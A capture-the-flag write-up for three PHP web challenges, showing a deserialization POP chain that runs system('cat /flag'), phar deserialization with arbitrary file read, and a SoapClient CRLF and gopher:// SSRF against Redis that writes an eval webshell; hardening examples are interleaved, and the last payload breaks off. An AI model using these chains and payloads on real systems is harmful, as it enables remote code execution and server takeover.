Title: DASCTF2022 —— October Tournament Web Part Writeup

EasyPOP

The challenge environment is PHP 7.4, so all property visibilities can simply be changed to public.

The entry point is __destruct() of the sorry class: echo $this->hint calls the __toString() of the show class, which executes $this->ctf->show() and so reaches __call() of the secret_code class, and from there the show() method. show() accesses a non-existent property, which jumps to __get() of the sorry class, and finally $name() reaches __invoke() of the fine class.

The POP chain is constructed as follows:

```php
<?php

// Chain: sorry::__destruct -> show::__toString -> secret_code::__call
//        -> show() -> sorry::__get -> fine::__invoke

class fine
{
    public $cmd;
    public $content;
}

class show
{
    public $ctf;
    public $time;
}

class sorry
{
    public $name;
    public $password;
    public $hint;
    public $key;
}

class secret_code
{
    public $code;
}

$e = new fine();
$e->cmd = 'system';
$e->content = 'cat /flag';

$d = new sorry();
$d->key = $e;

$c = new secret_code();
$c->code = $d;

$b = new show();
$b->ctf = $c;

$a = new sorry();
$a->name = '123';
$a->password = '123';
$a->hint = $b;

echo serialize($a);
```

Finally, change the number (the property count in the serialized string) to bypass __wakeup:

http://f9eac3ed-9425-4fe7-a009-aad41f9db212.node4.buuoj.cn:81/?pop=O:5:'sorry':4:{s:4:'name';s:'123';s:8:'password';s:'hint';O:4:'show':2:{s:'ctf';O:11:'secret_code':1:{s:4:'code';O:5:'sorry':4:{s:4:'name';N;s:8:'password';N;s:4:'hint';N;s:'key';O:4:'fine':{s:'cmd';s:6:'system';s:7:'content';s:93:'cat /flag';}}}s:4:'time';N;}s:3:'key';N;}
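From the defender's side, the chain above only fires because unserialize() is called on attacker-controlled input with every class allowed. The following is an added example, not code from the writeup or the challenge, showing the hardened form of such a ?pop= endpoint: with allowed_classes set to false no class is instantiated, so none of the magic methods in the chain (__destruct, __toString, __call, __get, __invoke) can run, and the property-count trick becomes irrelevant. The names safe_unserialize and contains_incomplete_object and the two sample inputs are assumptions made for this illustration.

```php
<?php
// Added example (not from the writeup or the challenge): a hardened version of
// an endpoint that unserializes a user-supplied parameter such as ?pop=...
// Assumes the endpoint only ever needs scalar/array data, never objects.

/**
 * Walk a decoded value and report whether any object slipped through.
 * With allowed_classes => false, PHP turns every O:/C: entry into a
 * __PHP_Incomplete_Class instead of instantiating the named class.
 */
function contains_incomplete_object($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_incomplete_object($item)) {
                return true;
            }
        }
    }
    return false;
}

/**
 * Deserialize untrusted input without instantiating classes.
 * Returns the decoded value, or null when the input is malformed or
 * contained an object (the only way a POP chain can start).
 */
function safe_unserialize(string $data)
{
    // allowed_classes => false: no __wakeup/__destruct/__toString/__call/
    // __get/__invoke can be reached from this input, whatever it contains.
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== 'b:0;') {
        return null;                       // malformed or tampered string
    }
    if (contains_incomplete_object($value)) {
        return null;                       // an object was smuggled in: reject
    }
    return $value;
}

// Constructed sample inputs for this illustration.
$benign = serialize(['page' => 2, 'sort' => 'name']);
// Same shape as the chain above (an outer sorry with a show in ->hint); the
// classes are deliberately not defined in this file, so nothing can execute.
$hostile = 'O:5:"sorry":1:{s:4:"hint";O:4:"show":0:{}}';

var_dump(safe_unserialize($benign));   // accepted: a plain array comes back
var_dump(safe_unserialize($hostile));  // rejected: null, no magic method ran
```

Where the parameter can be redesigned at all, JSON is the better carrier, since json_decode() never instantiates application classes; the allowed_classes guard is the minimal fix when the serialized format has to stay.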

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231752647.png

hade_waibo

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231753442.png

file.php can read arbitrary files, so its own source can be read directly:

http://745b93ee-b378-4803-b84e-52f9e7b78d2a.node4.buuoj.cn:81/file.php?m=show&filename=file.php

file.php

```php
<?php
error_reporting(0);
session_start();
include 'class.php';

if ($_SESSION['isLogin'] !== true) {
    die("<script>alert('Login for Thanks.');location.href='index.php'</script>");
}

$form = '
<form action="file.php?m=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<button class="mini ui button"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
submit
</font></font></button>
</form>';

$file = new File();

switch ($_GET['m']) {
    case 'upload':
        if (empty($_FILES)) { die($form); }
        // Only the last extension is checked against the whitelist
        $type = end(explode('.', $_FILES['file']['name']));
        if ($file->check($type)) {
            die($file->upload($type));
        } else {
            die('Do you eat oil cakes');
        }
        break;
    case 'show':
        // filename is passed straight to file_get_contents() in File::show()
        die($file->show($_GET['filename']));
        break;
    case 'rm':
        $file->rmfile();
        die('All deleted and pinched');
        break;
    case 'logout':
        session_destroy();
        die("<script>alert('Logined out');location.href='index.php'</script>");
        break;
    default:
        echo '<h2>Halo! ' . $_SESSION['username'] . '</h2>';
        break;
}
?>
```

class.php

```php
<?php

class User
{
    public $username;

    public function __construct($username)
    {
        $this->username = $username;
        $_SESSION['isLogin'] = True;
        $_SESSION['username'] = $username;
    }

    public function __wakeup()
    {
        $cklen = strlen($_SESSION['username']);
        if ($cklen != 0 and $cklen <= 6) {
            $this->username = $_SESSION['username'];
        }
    }

    public function __destruct()
    {
        if ($this->username == '') {
            session_destroy();
        }
    }
}

class File
{
    #Update the blacklist to a whitelist, making it safer
    public $white = array('jpg', 'png');

    public function show($filename)
    {
        echo '<div class="ui action input"><input type="text" id="filename" placeholder="Search."><button class="ui button" onclick="window.location.href=\'file.php?m=show&filename=\'+document.getElementById(\'filename\').value">Search</button></div><p>';
        if (empty($filename)) { die(); }
        // No path or wrapper check: reads any file, and a phar:// path
        // triggers deserialization of the archive metadata
        return '<img src="data:image/png;base64,' . base64_encode(file_get_contents($filename)) . '" />';
    }

    public function upload($type)
    {
        $filename = 'dasctf' . md5(time() . $_FILES['file']['name']) . '.' . $type;
        move_uploaded_file($_FILES['file']['tmp_name'], 'upload/' . $filename);
        return 'Upload success! Path: upload/' . $filename;
    }

    public function rmfile()
    {
        system('rm -rf /var/www/html/upload/*');
    }

    public function check($type)
    {
        if (!in_array($type, $this->white)) {
            return false;
        }
        return true;
    }
}

#Updated a malicious and interesting Test class
class Test
{
    public $value;

    public function __destruct()
    {
        chdir('./upload');
        $this->backdoor();
    }

    public function __wakeup()
    {
        $this->value = "Don't make dream.Wake up plz!";
    }

    public function __toString()
    {
        $file = substr($_GET['file'], 0, 3);
        file_put_contents($file, "Hack by $file !");
        return 'Unreachable!)';
    }

    public function backdoor()
    {
        // Any letter, digit, '?', '$' or '@' in value replaces it with 'nono~'
        if (preg_match('/[A-Za-z0-9?$@]+/', $this->value)) {
            $this->value = 'nono~';
        }
        system($this->value);
    }
}
```

The Test class can be used; the first thing I think of is phar deserialization.

The regex can be bypassed by using . to execute commands.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231758660.png

The idea is to upload the phar file first, and then upload a jpg that contains the command to be executed.

Note that the jpg's name must sort before the phar's: for example, if the phar is named dasctfe4.jpg, the jpg containing the command must be named something like dasctfc2.jpg or dasctf01.jpg (a smaller ASCII code).

However, when trying it, I found that bypassing __wakeup did not seem to work.

Then I remembered that while doing the EasyLove challenge there was a start.sh deployment script in the root directory. Based on the challenge description (tips: flag in a file under the / directory), I just read start.sh directly.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231801987.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231803463.png

Read /ghjsdk_F149_H3re_asdasfc to get the flag.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231804991.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231804073.png
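Both bugs chained in this challenge live in File::show(): file_get_contents() receives the raw filename parameter, which reads arbitrary paths (how file.php and start.sh were pulled) and, for a phar:// path, deserializes the archive metadata into the Test class. As an added example that is not part of the writeup or the challenge, here is a hardened replacement for that method. It refuses every stream wrapper, resolves the path and requires it to stay under the upload directory, and checks the extension against the same $white list the uploader uses. The names safe_show_path and show_image and the temporary-directory setup are assumptions made for this demonstration.

```php
<?php
// Added example (not from the writeup or the challenge): a hardened version of
// File::show(). safe_show_path, show_image and the temp-dir demo setup are
// assumptions made for this demonstration.

/**
 * Resolve $filename to a real file inside $baseDir, or return null.
 * Rejects: any scheme (phar://, php://, data://, ...), path traversal,
 * symlinks that escape the directory, and extensions outside the whitelist.
 */
function safe_show_path(string $filename, string $baseDir, array $white): ?string
{
    // 1. No stream wrappers at all; file_get_contents('phar://...') is what
    //    triggers metadata deserialization on PHP 7.x.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $filename)) {
        return null;
    }
    // 2. Extension check on the user-supplied name, same list as the uploader.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!in_array($ext, $white, true)) {
        return null;
    }
    // 3. Canonicalise and make sure the result is still under $baseDir.
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                         // resolved outside the upload directory
    }
    return $real;
}

function show_image(string $filename, string $baseDir, array $white): string
{
    $path = safe_show_path($filename, $baseDir, $white);
    if ($path === null) {
        return '<p>No such image.</p>';      // never echo the rejected name back
    }
    $mime = substr($path, -4) === '.jpg' ? 'image/jpeg' : 'image/png';
    return '<img src="data:' . $mime . ';base64,' . base64_encode(file_get_contents($path)) . '" />';
}

// --- constructed demo setup: a throwaway upload dir with one png inside it
//     and one png next to it (outside the allowed directory) ---
$white   = ['jpg', 'png'];
$upload  = sys_get_temp_dir() . '/upload_demo_' . getmypid();
$outside = sys_get_temp_dir() . '/outside_demo_' . getmypid() . '.png';
mkdir($upload);
file_put_contents($upload . '/dasctf01.png', base64_decode('iVBORw0KGgo='));  // PNG signature bytes
file_put_contents($outside, base64_decode('iVBORw0KGgo='));

$cases = [
    'dasctf01.png',                      // inside the directory, png: accepted
    '../' . basename($outside),          // real png, but escapes the directory: rejected by step 3
    '../../../etc/passwd',               // traversal, no whitelisted extension: rejected by step 2
    'phar://upload/dasctfe4.jpg/x.png',  // wrapper: rejected by step 1 before any file access
    'file.php',                          // source disclosure attempt: rejected by step 2
];
foreach ($cases as $name) {
    printf("%-36s %s\n", $name, safe_show_path($name, $upload, $white) === null ? 'rejected' : 'ok');
}

unlink($upload . '/dasctf01.png');
unlink($outside);
rmdir($upload);
```

If the application never legitimately opens phar archives, stream_wrapper_unregister('phar') at bootstrap removes that deserialization path entirely; PHP 8.0 also stopped unserializing phar metadata automatically on stream operations, which is why this class of chain is mostly a PHP 7 concern.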

EasyLove

Based on the Redis mentioned in the challenge description, the guess is that the goal is to get a shell via SSRF + Redis.

$this->love = new $this->wllm($this->arsenetang, $this->l61q4cheng); This line is obviously meant to perform the SSRF through some class.

As is well known, the Redis protocol is very loose and accepts commands sent inside HTTP packets, and PHP's native SoapClient class can send HTTP.

The payload is as follows:

```php
<?php

class swpu
{
    public $wllm;
    public $arsenetang;
    public $l61q4cheng;
    public $love;
}

$a = new swpu();
$a->wllm = 'SoapClient';
$a->arsenetang = null;
$target = 'http://127.0.0.1:6379/';
// Redis commands separated by CRLF; SoapClient copies the uri into the request headers
$poc = "flushall\r\nconfig set dir /var/www/html/\r\nconfig set dbfilename shell.php\r\nset xzxzxz '<?=eval(\$_REQUEST[1])?>'\r\nsave";
$a->l61q4cheng = array('location' => $target, 'uri' => "hello\r\n" . $poc . "\r\nhello");

echo urlencode(serialize($a));
```

It kept hanging during the attempt (a normal phenomenon), and visiting shell.php also returned 404.

So I guessed that Redis might have authentication. I read the hint class in the challenge and obtained the content of hint.php through file_get_contents().

Deserializing hint directly gives no echo. As a result, when I wanted to try file_get_contents() + gopher, I read hint.php by accident.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231829355.png

```php
<?php

class hint
{
    public $hint;
}

$a = new hint();
$a->hint = 'gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A';

echo serialize($a);
```

http://0021bfdb-5d2b-42ff-9505-49d23c4aa0e2.node4.buuoj.cn:81/?hello=O:4:'hint':1:{s:4:'hint';s:404:'gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2422%0D%0A%0A%0A%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A';}

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210231830188.png

Guess that 20220311 is the Redis password.

So the final payload is as follows:

```php
<?php

class swpu
{
    public $wllm;
    public $arsenetang;
    public $l61q4cheng;
    public $love;
}

$a = new swpu();
$a->wllm = 'SoapClient';
$a->arsenetang = null;
$target = 'http://127.0.0.1:6379/';
// Same as before, with the guessed password sent first via AUTH
$poc = "auth 20220311\r\nflushall\r\nconfig set dir /var/www/html/\r\nconfig set dbfilename shell.php\r\nset
```
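On the application side the root cause is new $this->wllm(...): a class name and constructor arguments both taken from the deserialized object, which is how SoapClient ended up talking to Redis on 127.0.0.1:6379. As an added example that is not part of the writeup or the challenge, the following shows an allowlisted factory together with an outbound-URL check for the one legitimate HTTP-client use: it rejects CR/LF in any option (the header-injection vector used above), non-http(s) schemes (so the gopher://127.0.0.1:6379/ string handed to file_get_contents() through the hint class would also fail), service ports, and loopback or private hosts. The names build_client and validate_outbound_url and the sample option sets are assumptions made for this illustration.

```php
<?php
// Added example (not from the writeup or the challenge): replacing
// `new $this->wllm($this->arsenetang, $this->l61q4cheng)` with an allowlisted
// factory plus outbound-URL validation. build_client, validate_outbound_url
// and the sample option sets below are assumptions made for this illustration.

/** True only for plain http(s) on port 80/443 to a non-loopback, non-private host. */
function validate_outbound_url(string $url): bool
{
    if (preg_match('/[\r\n]/', $url)) {
        return false;                                   // header injection
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;                                   // no gopher:, dict:, file:, ...
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return false;                                   // 6379 and other service ports
    }
    $host = $parts['host'];
    // Resolve names to an address so "localhost" or a rebinding name cannot
    // slip past the range check; gethostbyname echoes the name back on failure,
    // and a name is not a valid IP, so that case is rejected too.
    $ip = filter_var($host, FILTER_VALIDATE_IP) ? $host : gethostbyname($host);
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;   // drops 127/8, 10/8, 192.168/16, ...
}

/** Build one of a fixed set of client classes; the class name never comes from input. */
function build_client(string $kind, array $options): object
{
    $allowed = ['soap' => 'SoapClient'];                // the only class this app may build
    if (!isset($allowed[$kind])) {
        throw new InvalidArgumentException('unknown client kind');
    }
    foreach ($options as $key => $value) {
        if (is_string($value) && preg_match('/[\r\n]/', $value)) {
            throw new InvalidArgumentException("CR/LF in option $key");
        }
    }
    if (isset($options['location']) && !validate_outbound_url($options['location'])) {
        throw new InvalidArgumentException('location not allowed');
    }
    $class = $allowed[$kind];
    return new $class(null, $options);                  // non-WSDL mode: no request is sent here
}

// --- constructed demo inputs ---
$samples = [
    'redis-via-soap'      => ['location' => 'http://127.0.0.1:6379/', 'uri' => "hello\r\nflushall\r\nhello"],
    'loopback-only'       => ['location' => 'http://127.0.0.1/', 'uri' => 'urn:demo'],
    'documentation-range' => ['location' => 'http://203.0.113.10/soap', 'uri' => 'urn:demo'], // TEST-NET-3, treated as public
];
foreach ($samples as $label => $opts) {
    try {
        build_client('soap', $opts);
        echo "$label: accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "$label: rejected (" . $e->getMessage() . ")\n";
    } catch (Error $e) {
        echo "$label: passed validation, but ext-soap is not loaded here\n";
    }
}
```

Two caveats worth keeping in mind: the DNS resolution in validate_outbound_url is a point-in-time check, so a rebinding name can still resolve differently when SoapClient connects, and the Redis side needs its own hardening regardless, since the writeup shows that a password alone was only a guessable speed bump. Binding Redis to a Unix socket or a non-web network, keeping protected-mode on, and disabling CONFIG with rename-command are what stop the config set dir / dbfilename write even after AUTH succeeds.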
